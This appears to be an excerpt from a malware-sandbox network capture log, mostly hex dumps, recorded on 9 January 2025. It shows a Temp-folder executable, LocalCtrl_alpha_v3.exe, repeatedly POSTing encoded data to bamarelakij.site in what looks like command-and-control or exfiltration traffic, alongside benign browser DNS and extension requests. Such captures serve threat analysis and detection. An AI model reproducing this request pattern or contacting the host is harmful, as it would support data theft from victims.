2025-01-09 13:42:20 UTC	1369	IN	Data Raw: 0f 00 e4 0e 16 11 02 e4 04 34 59 4c 09 70 89 a2 0d 81 ac 6d 3e 09 00 cc 05 88 07 13 00 ec 0e 16 11 02 ec 08 34 59 88 07 65 9b b6 a7 b7 51 c9 59 a4 37 32 b2 3c b2 32 22 21 0a 00 37 04 08 0e 13 00 ec 0e 16 11 02 ec 08 76 59 08 0e 65 9b b6 a7 b7 51 c9 59 b6 b9 b2 32 b3 b2 17 b2 3c b2 0b 00 ef 03 72 0f 13 00 ec 0e 16 11 02 ec 08 3e 59 72 0f 65 9b b6 a7 b7 51 c9 59 15 b9 3a b2 b0 b6 15 17 b2 3c b2 11 00 fd 0b 46 03 13 00 ec 0e 16 11 02 ec 08 9a 59 46 03 65 9b b6 a7 b7 51 c9 59 a9 a7 23 2a ab a0 29 a2 2e 2a b4 b3 b2 39 2b 27 a1 11 00 9a 05 08 07 13 00 ec 0e 16 11 02 ec 08 76 59 08 07 65 9b b6 a7 b7 51 c9 59 b1 34 39 b7 b6 b4 ba b6 af 31 39 b7 bb b9 b2 39 b9 08 00 74 0f fb 05 13 00 eb 0e 16 11 02 eb 08 34 59 fb 05 00 ab 5b 92 bc 4e 15 2c f5 35 c4 f5 80 7d 53 df Data Ascii: 4YLpm>4YeQY72<2"!7vYeQY2<r>YreQY:<FYFeQY#).9+'vYeQY49199t4Y[N,5}S
2025-01-09 13:42:20 UTC	1369	IN	Data Raw: 02 ec 08 ed 59 98 04 65 9b b6 a7 b7 51 c9 59 15 17 39 32 38 04 00 f5 0e e9 0a 0f 00 e4 0e 16 11 02 e4 04 76 59 e9 0a 2c 36 e8 17 dc f2 d2 21 0b 00 96 04 66 0e 13 00 ec 0e 16 11 02 ec 08 ed 59 66 0e 65 9b b6 a7 b7 51 c9 59 a0 37 bc 22 b2 b9 b5 17 b2 3c b2 08 00 1b 0f 85 0c 13 00 eb 0e 16 11 02 eb 08 d8 59 85 0c 42 e9 cd 96 64 55 b8 e2 b3 77 52 f1 58 66 fe 11 06 00 23 01 93 0f 13 00 ec 0e 16 11 02 ec 08 72 59 93 0f 65 9b b6 a7 b7 51 c9 59 a0 39 b6 b7 39 bc 04 00 fa 05 f8 04 0f 00 e4 0e 16 11 02 e4 04 61 59 f8 04 84 f8 45 7e 75 dd 8a 4d 08 00 68 0c ae 06 13 00 ec 0e 16 11 02 ec 08 5b 59 ae 06 65 9b b6 a7 b7 51 c9 59 28 b0 b9 b9 bb b7 39 32 04 00 31 0c 76 0f 0f 00 e4 0e 16 11 02 e4 04 34 59 76 0f 71 a1 31 f5 80 84 fe c6 07 00 b1 04 2e 08 13 00 ec 0e 16 11 02 Data Ascii: YeQY928vY,6!fYfeQY7"<YBdUwRXf#rYeQY99aYE~uMh[YeQY(921v4Yvq1.
2025-01-09 13:42:20 UTC	1369	IN	Data Raw: 11 02 ec 08 34 59 33 0c 65 9b b6 a7 b7 51 c9 59 15 17 b9 b8 36 b4 3a b2 04 00 51 0a e1 09 0f 00 e4 0e 16 11 02 e4 04 73 59 e1 09 df f9 2c 2e 2f d8 e3 1d 04 00 71 0e b1 02 0f 00 e4 0e 16 11 02 e4 04 72 59 b1 02 45 2f 34 7f b7 0a fb 4c 06 00 91 0e f5 0b 13 00 ec 0e 16 11 02 ec 08 9a 59 f5 0b 65 9b b6 a7 b7 51 c9 59 2b b4 b2 bb b2 39 08 00 d8 0c 5a 0f 13 00 eb 0e 16 11 02 eb 08 9a 59 5a 0f c4 f8 d0 16 6d 6a 27 5c 35 66 4f 71 51 59 61 af 04 00 a2 0c 14 09 0f 00 e4 0e 16 11 02 e4 04 72 59 14 09 06 73 70 1d f6 b7 4a 2b 05 00 62 0f 01 01 13 00 ec 0e 16 11 02 ec 08 76 59 01 01 65 9b b6 a7 b7 51 c9 59 15 17 36 32 31 25 00 40 0e b7 04 13 00 ec 0e 16 11 02 ec 08 76 59 b7 04 65 9b b6 a7 b7 51 c9 59 a6 b4 b1 39 b7 b9 b7 33 3a 2e a2 32 b3 b2 2e a0 38 38 36 b4 b1 b0 3a Data Ascii: 4Y3eQY6:QsY,./qrYE/4LYeQY+9ZYZmj'\5fOqQYarYspJ+bvYeQY621%@vYeQY93:.2.886:
2025-01-09 13:42:20 UTC	1369	IN	Data Raw: 02 ec 08 34 59 d1 05 65 9b b6 a7 b7 51 c9 59 24 b4 b9 3a b7 39 bc 04 00 d2 0b 8a 0a 0f 00 e4 0e 16 11 02 e4 04 72 59 8a 0a 34 5e 90 bc c4 7b 5f 8f 08 00 a7 05 04 0f 13 00 eb 0e 16 11 02 eb 08 76 59 04 0f 95 12 0b 84 ba 02 75 3e b8 89 94 e3 86 31 33 cd 04 00 f5 03 34 05 0f 00 e4 0e 16 11 02 e4 04 72 59 34 05 69 42 1a 51 99 67 d5 62 08 00 25 07 5d 0e 13 00 eb 0e 16 11 02 eb 08 34 59 5d 0e 6a 12 61 4e 88 ae 7f b6 9b 8c fe 29 b4 9d 39 45 08 00 1e 03 e9 09 13 00 eb 0e 16 11 02 eb 08 9a 59 e9 09 dd d5 39 9b bd 27 28 fd 2c 4b a6 fc 81 14 6e 0e 04 00 10 07 74 0b 0f 00 e4 0e 16 11 02 e4 04 72 59 74 0b e6 76 8b fb 16 53 44 c8 04 00 c8 01 9f 01 0f 00 e4 0e 16 11 02 e4 04 72 59 9f 01 c7 17 73 5c 36 32 bc 6f 08 00 11 04 ce 00 13 00 eb 0e 16 11 02 eb 08 34 59 ce 00 be Data Ascii: 4YeQY$:9rY4^{_vYu>134rY4iBQgb%]4Y]jaN)9EY9'(,KntrYtvSDrYs\62o4Y
2025-01-09 13:42:20 UTC	1369	IN	Data Raw: 00 ec 0e 16 11 02 ec 08 34 59 04 03 65 9b b6 a7 b7 51 c9 59 a6 b4 b1 39 b7 b9 b7 33 3a 2e a7 ba 3a 36 b7 b7 b5 04 00 be 0b e8 09 0f 00 e4 0e 16 11 02 e4 04 76 59 e8 09 f8 a5 d3 7c 08 61 e9 4a 1d 00 66 09 02 08 13 00 ec 0e 16 11 02 ec 08 73 59 02 08 65 9b b6 a7 b7 51 c9 59 b6 b2 b9 b9 b2 37 b3 b2 39 b9 2e 22 b4 b9 b1 b7 39 32 2e a9 3a b0 31 36 b2 2e b5 b2 bc 04 00 47 06 a0 0f 0f 00 e4 0e 16 11 02 e4 04 34 59 a0 0f a5 f3 2d 12 54 d6 e2 21 04 00 ed 03 21 0f 0f 00 e4 0e 16 11 02 e4 04 72 59 21 0f f2 f7 51 80 02 d6 9e b3 24 00 51 0b 4f 0a 13 00 ec 0e 16 11 02 ec 08 76 59 4f 0a 65 9b b6 a7 b7 51 c9 59 a3 b7 b7 b3 36 b2 2e a1 34 39 b7 b6 b2 2e a0 38 38 36 b4 b1 b0 3a b4 b7 37 2e b1 34 39 b7 b6 b2 17 b2 3c b2 05 00 dd 0a f6 07 13 00 ec 0e 16 11 02 ec 08 34 59 f6 Data Ascii: 4YeQY93:.:6vY\|aJfsYeQY79."92.:16.G4Y-T!!rY!Q$QOvYOeQY6.49.886:7.49<4Y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49715	172.67.174.91	443	1280	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:42:21 UTC	435	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37A Content-Length: 53 Host: bamarelakij.site
2025-01-09 13:42:21 UTC	53	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 03 02 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2025-01-09 13:42:21 UTC	746	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 13:42:21 GMT Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R2tEHyPiHEbgIhi%2FUBHqvkLqAg8l7trOHPmtVZG8CieD7Opx1dECGWvCjVF1WYDODUMepcamRViXoL5Ka0pk40vnJYuf1qa%2FLYY97ps0JOSwE%2BGOOswPefbPofqTpFilrrXz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4d9a1797c7cf0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1988&min_rtt=1946&rtt_var=759&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1124&delivery_rate=1500513&cwnd=230&unsent_bytes=0&cid=bf4c15fa61906297&ts=324&x=0"
2025-01-09 13:42:21 UTC	24	IN	Data Raw: 31 32 0d 0a 02 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 91 90 0d 0a Data Ascii: 12
2025-01-09 13:42:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49716	172.67.174.91	443	1280	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:42:22 UTC	436	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37A Content-Length: 208 Host: bamarelakij.site
2025-01-09 13:42:22 UTC	208	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 95 00 00 00 08 00 00 00 52 00 00 00 b5 05 3d 2c 95 a7 40 16 d7 35 c9 59 81 00 00 00 00 00 00 00 00 00 00 00 da 82 9e 16 49 60 48 31 00 00 00 00 00 00 00 00 00 00 00 da 82 9e 16 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: R=,@5YI`H1(((
2025-01-09 13:42:23 UTC	807	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:42:22 GMT Connection: close v: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37A cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=61mn2gnFnGOXlcJnPlp94coLpU%2FBOnnB9fK1%2FymMM0tTqkmU%2FYF7dNoVZJslGUEqhuH7850u%2FFNxFx5tOnsjSvQLga5Y2Kx8uEIHv9mWlXfKhweHl6hzbZ4HNF5CyYCnyadB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4d9a86f59433f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1633&rtt_var=618&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1280&delivery_rate=1762220&cwnd=222&unsent_bytes=0&cid=5441878c3de36fd1&ts=336&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49749	172.64.41.3	443	7320	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:42:35 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2025-01-09 13:42:35 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2025-01-09 13:42:35 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Thu, 09 Jan 2025 13:42:35 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8ff4d9f67bc118bc-EWR alt-svc: h3=":443"; ma=86400
2025-01-09 13:42:35 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 0b 00 04 8e fa 50 23 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomP#)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49748	172.64.41.3	443	7320	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:42:35 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2025-01-09 13:42:35 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2025-01-09 13:42:35 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Thu, 09 Jan 2025 13:42:35 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8ff4d9f68e0ff791-EWR alt-svc: h3=":443"; ma=86400
2025-01-09 13:42:35 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 19 00 04 8e fa 50 23 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomP#)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49750	162.159.61.3	443	7320	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:42:35 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2025-01-09 13:42:35 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2025-01-09 13:42:35 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Thu, 09 Jan 2025 13:42:35 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8ff4d9f6eb184314-EWR alt-svc: h3=":443"; ma=86400
2025-01-09 13:42:35 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 f7 00 04 8e fb 29 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom))

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49746	172.217.18.97	443	7320	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:42:35 UTC	594	OUT	GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1 Host: clients2.googleusercontent.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2025-01-09 13:42:35 UTC	563	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AFiumC60FXRFlnBRBQi3LEUQz5M9VCEpErAbNS4XBkrIk4uwQb-qy4IaP1uysfsIwpme-vjK Accept-Ranges: bytes Content-Length: 154477 X-Goog-Hash: crc32c=F5qq4g== Server: UploadServer Date: Wed, 08 Jan 2025 15:58:13 GMT Expires: Thu, 08 Jan 2026 15:58:13 GMT Cache-Control: public, max-age=31536000 Age: 78262 Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083 Content-Type: application/x-chrome-extension Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-09 13:42:35 UTC	827	IN	Data Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08 Data Ascii: Cr240"0H0^1"wgt2JG1)X4=&?[j,Lzjue[IqBa/XPhL2%3_oH)'=e?j3UH\|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
2025-01-09 13:42:35 UTC	1390	IN	Data Raw: d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 0e cf 9c ab 3d a2 Data Ascii: Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,\|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr=
2025-01-09 13:42:35 UTC	1390	IN	Data Raw: fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd 1a e5 55 bd 63 44 Data Ascii: @uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4\|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[uUcD
2025-01-09 13:42:35 UTC	1390	IN	Data Raw: ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57 ce c3 98 bb Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G\|?6:{r;iGW
2025-01-09 13:42:35 UTC	1390	IN	Data Raw: fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a be f9 ed d4 c0 dd Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}\|.nw'Gw=n'CSZB=
